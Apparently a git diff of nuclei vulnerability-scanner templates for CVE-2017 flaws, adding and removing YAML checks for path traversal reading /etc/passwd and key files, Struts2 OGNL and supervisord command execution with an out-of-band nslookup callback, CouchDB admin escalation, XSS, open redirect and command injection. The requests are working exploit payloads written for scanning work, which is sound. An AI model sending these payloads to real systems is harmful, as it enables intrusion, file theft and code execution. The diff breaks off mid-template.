+ - "http" diff --git a/nuclei-templates/CVE-2017/CVE-2017-9833.yaml b/nuclei-templates/CVE-2017/CVE-2017-9833.yaml new file mode 100644 index 0000000000..2f8c595a7e --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-9833.yaml @@ -0,0 +1,35 @@ +id: CVE-2017-9833 + +info: + name: BOA Web Server 0.94.14 - Arbitrary File Access + author: 0x_Akoko + severity: high + description: BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials. + reference: + - https://www.exploit-db.com/exploits/42290 + - https://www.cvedetails.com/cve/CVE-2017-9833 + - https://pastebin.com/raw/rt7LJvyF + - https://www.exploit-db.com/exploits/42290/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-9833 + cwe-id: CWE-22 + tags: boa,lfr,lfi,cve,cve2017 + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/12 diff --git a/nuclei-templates/CVE-2017/cve-2017-9841.yaml b/nuclei-templates/CVE-2017/CVE-2017-9841.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-9841.yaml rename to nuclei-templates/CVE-2017/CVE-2017-9841.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-1000029.yaml b/nuclei-templates/CVE-2017/cve-2017-1000029.yaml new file mode 100644 index 0000000000..cff57e655a --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-1000029.yaml @@ -0,0 +1,44 @@ +id: CVE-2017-1000029 + +info: + name: Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion + author: 0x_Akoko + severity: high + description: Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. + remediation: | + Apply the latest patches and updates provided by Oracle to fix the LFI vulnerability in GlassFish Server. + reference: + - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784 + - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037 + - https://nvd.nist.gov/vuln/detail/CVE-2017-1000029 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-1000029 + cwe-id: CWE-200 + epss-score: 0.00387 + epss-percentile: 0.70348 + cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:* + metadata: + max-request: 1 + vendor: oracle + product: glassfish_server + tags: cve,cve2017,glassfish,oracle,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/resource/file%3a///etc/passwd/" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + + - type: status + status: + - 200 +# digest: 4a0a0047304502202b1ecb4a01d3db488f18d88e30890c01ab67d73172dcd959724ffd53e260af84022100d6f4a9096dc94f23108e95c441641bdee5d1b3a9ca2b8fd037cca63a94e1a6dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-1000170.yaml b/nuclei-templates/CVE-2017/cve-2017-1000170.yaml deleted file mode 100644 index 9c2bcff1c4..0000000000 --- a/nuclei-templates/CVE-2017/cve-2017-1000170.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2017-1000170 - -info: - name: WordPress Plugin Delightful Downloads Jquery File Tree 2.1.5 Path Traversal - author: dwisiswant0 - severity: high - reference: https://www.exploit-db.com/exploits/49693 - description: jqueryFileTree 2.1.5 and older Directory Traversal - tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2017-1000170 - cwe-id: CWE-22 - -requests: - - method: POST - path: - - "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php" - body: "dir=%2Fetc%2F&onlyFiles=true" - matchers-condition: and - matchers: - - type: word - words: - - "
  • " - - "passwd
    • " - condition: and - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2017/cve-2017-10974.yaml b/nuclei-templates/CVE-2017/cve-2017-10974.yaml new file mode 100644 index 0000000000..cab8f1de5d --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-10974.yaml @@ -0,0 +1,36 @@ +id: CVE-2017-10974 + +info: + name: Yaws 1.91 - Remote File Disclosure + author: 0x_Akoko + severity: high + description: Yaws 1.91 allows Unauthenticated Remote File Disclosure via HTTP Directory Traversal with /%5C../ to port 8080 + reference: + - https://www.exploit-db.com/exploits/42303 + - https://nvd.nist.gov/vuln/detail/CVE-2017-10974 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-10974 + cwe-id: CWE-22 + tags: cve,cve2017,yaws,lfi + + +requests: + - method: GET + path: + - "{{BaseURL}}/%5C../ssl/yaws-key.pem" + + matchers-condition: and + matchers: + - type: word + words: + - "BEGIN RSA PRIVATE KEY" + + - type: status + status: + - 200 + + - type: dsl + dsl: + - '!contains(tolower(body), " - supervisor.supervisord.options.warnings.linecache.os.system - - - nslookup {{interactsh-url}} - - - - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "dns" - - - type: word - part: header - words: - - "text/xml" - - - type: word - part: body - words: - - "" - - "" - condition: and diff --git a/nuclei-templates/CVE-2017/cve-2017-12544.yaml b/nuclei-templates/CVE-2017/cve-2017-12544.yaml deleted file mode 100644 index c6e8191672..0000000000 --- a/nuclei-templates/CVE-2017/cve-2017-12544.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2017-12544 - -info: - name: HPE System Management - XSS - author: divya_mudgal - severity: medium - description: Reflected Cross-site scripting (XSS) on HPE System Management - reference: - - https://seclists.org/fulldisclosure/2018/Mar/5 - - https://nvd.nist.gov/vuln/detail/CVE-2017-12544 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2017-12544 - cwe-id: CWE-79 - tags: cve,cve2017,xss,hp - -requests: - - method: GET - path: - - "{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//" - - matchers-condition: and - matchers: - - type: word - words: - - "var prodName = '';prompt`document.domain`;//';" - part: body - - - type: word - words: - - "text/html" - part: header - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2017/cve-2017-12611.yaml b/nuclei-templates/CVE-2017/cve-2017-12611.yaml new file mode 100644 index 0000000000..d4f8d1050e --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-12611.yaml @@ -0,0 +1,30 @@ +id: CVE-2017-12611 + +info: + name: Apache Struts2 S2-053 RCE + author: pikpikcu + severity: critical + description: In Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1, using an unintentional expression in a Freemarker tag instead of string literals can lead to a RCE attack. + reference: https://struts.apache.org/docs/s2-053.html + tags: cve,cve2017,apache,rce,struts + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-12611 + cwe-id: CWE-20 + +requests: + - method: POST + path: + - "{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2017/cve-2017-12635.yaml b/nuclei-templates/CVE-2017/cve-2017-12635.yaml new file mode 100644 index 0000000000..102fb0d338 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-12635.yaml @@ -0,0 +1,49 @@ +id: CVE-2017-12635 + +info: + name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 Remote Privilege Escalation + author: pikpikcu + severity: critical + description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges. + reference: https://github.com/assalielmehdi/CVE-2017-12635 + tags: cve,cve2017,couchdb,apache + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-12635 + cwe-id: CWE-269 + +requests: + - raw: + - | + PUT /_users/org.couchdb.user:poc HTTP/1.1 + Host: {{Hostname}} + Accept: application/json + + { + "type": "user", + "name": "poc", + "roles": ["_admin"], + "roles": [], + "password": "123456" + } + + matchers-condition: and + matchers: + - type: word + words: + - "application/json" + - "Location:" + part: header + + - type: word + words: + - "org.couchdb.user:poc" + - "conflict" + - "Document update conflict" + part: body + + - type: status + status: + - 201 + - 409 diff --git a/nuclei-templates/CVE-2017/cve-2017-12637.yaml b/nuclei-templates/CVE-2017/cve-2017-12637.yaml new file mode 100644 index 0000000000..681d71740a --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-12637.yaml @@ -0,0 +1,33 @@ +id: CVE-2017-12637 + +info: + name: Directory traversal vulnerability in SAP NetWeaver Application Server Java 7.5 + author: apt-mirror + severity: high + description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657. + tags: cve,cve2017,sap,lfi,java,traversal + reference: + - https://www.cvedetails.com/cve/CVE-2017-12637/ + - https://nvd.nist.gov/vuln/detail/CVE-2017-12637 + - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-12637 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.." + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "WEB-INF" + - "META-INF" + condition: and + part: body diff --git a/nuclei-templates/CVE-2017/cve-2017-12794.yaml b/nuclei-templates/CVE-2017/cve-2017-12794.yaml new file mode 100644 index 0000000000..ad1ea847cc --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-12794.yaml @@ -0,0 +1,38 @@ +id: CVE-2017-12794 + +info: + name: Django debug page XSS + author: pikpikcu + severity: medium + reference: + - https://twitter.com/sec715/status/1406779605055270914 + - https://nvd.nist.gov/vuln/detail/CVE-2017-12794 + description: | + In Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5, HTML autoescaping was disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allowed a cross-site scripting attack. This vulnerability shouldn't affect most production sites since you shouldn't run with "DEBUG = True" (which makes this page accessible) in your production settings. + tags: xss,django,cve,cve2017 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-12794 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + part: header diff --git a/nuclei-templates/CVE-2017/cve-2017-14524.yaml b/nuclei-templates/CVE-2017/cve-2017-14524.yaml new file mode 100644 index 0000000000..20a95213bc --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-14524.yaml @@ -0,0 +1,43 @@ +id: CVE-2017-14524 + +info: + name: OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect + author: 0x_Akoko + severity: medium + description: | + OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. + remediation: | + Apply the latest security patches or upgrade to a patched version of OpenText Documentum Administrator. + reference: + - https://seclists.org/fulldisclosure/2017/Sep/57 + - https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774 + - https://nvd.nist.gov/vuln/detail/CVE-2017-14524 + - http://seclists.org/fulldisclosure/2017/Sep/57 + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-14524 + cwe-id: CWE-601 + epss-score: 0.00258 + epss-percentile: 0.6357 + cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: opentext + product: documentum_administrator + tags: cve2017,cve,redirect,opentext,seclists + +http: + - method: GET + path: + - '{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' +# digest: 4b0a00483046022100b32892e1ac671729ba982d52eb2d13b0e91ddae6c90c6b945a64e664d066cdb9022100eb9538968f1f58b108976f27fc2fa9ed8990673db1a2e1e1611c8fa3cfb12b8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-14535.yaml b/nuclei-templates/CVE-2017/cve-2017-14535.yaml deleted file mode 100644 index 8cc11f11f1..0000000000 --- a/nuclei-templates/CVE-2017/cve-2017-14535.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2017-14535 - -info: - name: Trixbox - 2.8.0.4 OS Command Injection Vulnerability - author: pikpikcu - severity: high - reference: - - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ - - https://www.exploit-db.com/exploits/49913 - tags: cve,cve2017,trixbox,rce,injection - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 - cve-id: CVE-2017-14535 - cwe-id: CWE-78 - description: "trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php." - -requests: - - raw: - - | - GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: de,en-US;q=0.7,en;q=0.3 - Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= - Connection: close - Cache-Control: max-age=0 - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2017/cve-2017-14537.yaml b/nuclei-templates/CVE-2017/cve-2017-14537.yaml new file mode 100644 index 0000000000..03689a2002 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-14537.yaml @@ -0,0 +1,49 @@ +id: CVE-2017-14537 + +info: + name: trixbox 2.8.0 - directory-traversal + author: pikpikcu + severity: medium + tags: cve,cve2017,trixbox,lfi + description: trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-14537 + - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/ + - https://sourceforge.net/projects/asteriskathome/ # vendor homepage + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2017-14537 + cwe-id: CWE-22 + +requests: + - raw: + - | + POST /maint/index.php?packages HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{Hostname}}/maint/index.php?packages + Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2 + Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= + + xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages + + - | + GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Referer: {{Hostname}}/maint/index.php?packages + Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2 + Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + regex: + - "root:.*:0:0:" + part: body diff --git a/nuclei-templates/CVE-2017/cve-2017-14651.yaml b/nuclei-templates/CVE-2017/cve-2017-14651.yaml new file mode 100644 index 0000000000..91fc63e9f3 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-14651.yaml @@ -0,0 +1,37 @@ +id: CVE-2017-14651 + +info: + name: Reflected XSS - WSO2 Data Analytics Server + author: mass0ma + severity: medium + description: WSO2 Data Analytics Server 3.1.0 has XSS in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter. + tags: cve,cve2017,wso2,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.80 + cve-id: CVE-2017-14651 + cwe-id: CWE-79 + reference: + - https://github.com/cybersecurityworks/Disclosed/issues/15 + - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265 + - https://cybersecurityworks.com/zerodays/cve-2017-14651-wso2.html + +requests: + - method: GET + path: + - "{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E" + + matchers-condition: and + matchers: + + - type: word + words: + - "" + - "Failed to add new collection" + part: body + condition: and + + - type: word + words: + - "text/html" + part: header \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-14849.yaml b/nuclei-templates/CVE-2017/cve-2017-14849.yaml deleted file mode 100644 index 6a386ab381..0000000000 --- a/nuclei-templates/CVE-2017/cve-2017-14849.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2017-14849 - -info: - name: Node.js 8.5.0 >=< 8.6.0 Directory Traversal - author: Random_Robbie - severity: high - description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules. - tags: cve,cve2017,nodejs,lfi - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2017-14849 - cwe-id: CWE-22 - reference: - - https://twitter.com/nodejs/status/913131152868876288 - - https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/ - - http://www.securityfocus.com/bid/101056 - -requests: - - method: GET - path: - - "{{BaseURL}}/static/../../../a/../../../../etc/passwd" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body diff --git a/nuclei-templates/CVE-2017/cve-2017-15287.yaml b/nuclei-templates/CVE-2017/cve-2017-15287.yaml deleted file mode 100644 index 01f1620919..0000000000 --- a/nuclei-templates/CVE-2017/cve-2017-15287.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2017-15287 - -info: - name: Dreambox WebControl Reflected XSS - author: pikpikcu - severity: medium - tags: cve,cve2017,xss,dreambox - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2017-15287 - cwe-id: CWE-79 - description: "There is XSS in the BouquetEditor WebPlugin for Dream Multimedia Dreambox devices, as demonstrated by the \"Name des Bouquets\" field, or the file parameter to the /file URI." - reference: - - https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf - - https://www.exploit-db.com/exploits/42986/ - -requests: - - raw: - - | - GET /webadmin/pkg?command= HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - matchers: - - type: word - words: - - 'Unknown command: ' diff --git a/nuclei-templates/CVE-2017/cve-2017-15647.yaml b/nuclei-templates/CVE-2017/cve-2017-15647.yaml new file mode 100644 index 0000000000..57a6eda186 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-15647.yaml @@ -0,0 +1,32 @@ +id: CVE-2017-15647 + +info: + name: FiberHome - Directory Traversal + author: daffainfo + severity: high + description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. + reference: + - https://www.exploit-db.com/exploits/44054 + - https://www.cvedetails.com/cve/CVE-2017-15647 + tags: cve,cve2017,lfi,router + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-15647 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2017/cve-2017-15944.yaml b/nuclei-templates/CVE-2017/cve-2017-15944.yaml new file mode 100644 index 0000000000..48553abee3 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-15944.yaml @@ -0,0 +1,33 @@ +id: CVE-2017-15944 + +info: + name: PreAuth RCE on Palo Alto GlobalProtect + author: emadshanab,milo2012 + description: Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface. + reference: + - https://www.exploit-db.com/exploits/43342 + - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html + severity: critical + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-15944 + tags: cve,cve2017,rce,vpn,panos,globalprotect + +requests: + - raw: + - | + GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1 + Host: {{Hostname}} + Cookie: PHPSESSID={{randstr}}; + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "@start@Success@end@" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-16806.yaml b/nuclei-templates/CVE-2017/cve-2017-16806.yaml new file mode 100644 index 0000000000..e4057dae37 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-16806.yaml @@ -0,0 +1,32 @@ +id: CVE-2017-16806 + +info: + name: Ulterius Server < 1.9.5.0 - Directory Traversal + author: geeknik + reference: https://www.exploit-db.com/exploits/43141 + severity: high + tags: cve,cve2017,ulterius,traversal + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-16806 + cwe-id: CWE-22 + description: "The Process function in RemoteTaskServer/WebServer/HttpServer.cs in Ulterius before 1.9.5.0 allows HTTP server directory traversal." + +requests: + - method: GET + path: + - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini" + - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or + part: body diff --git a/nuclei-templates/CVE-2017/cve-2017-17043.yaml b/nuclei-templates/CVE-2017/cve-2017-17043.yaml deleted file mode 100644 index 9eb08d7a3a..0000000000 --- a/nuclei-templates/CVE-2017/cve-2017-17043.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2017-17043 - -info: - name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly. - reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043 - tags: cve,cve2017,wordpress,xss,wp-plugin - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2017-17043 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2017/cve-2017-17451.yaml b/nuclei-templates/CVE-2017/cve-2017-17451.yaml deleted file mode 100644 index 2cd0371034..0000000000 --- a/nuclei-templates/CVE-2017/cve-2017-17451.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2017-17451 - -info: - name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. - reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451 - tags: cve,cve2017,wordpress,xss,wp-plugin - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2017-17451 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2017/cve-2017-18024.yaml b/nuclei-templates/CVE-2017/cve-2017-18024.yaml new file mode 100644 index 0000000000..89de79241d --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-18024.yaml @@ -0,0 +1,45 @@ +id: CVE-2017-18024 + +info: + name: AvantFAX 3.3.3 XSS + author: pikpikcu + severity: medium + reference: + - https://hackerone.com/reports/963798 + - http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2017-18024 + description: | + AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1. + tags: cve,cve2017,xss,avantfax + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 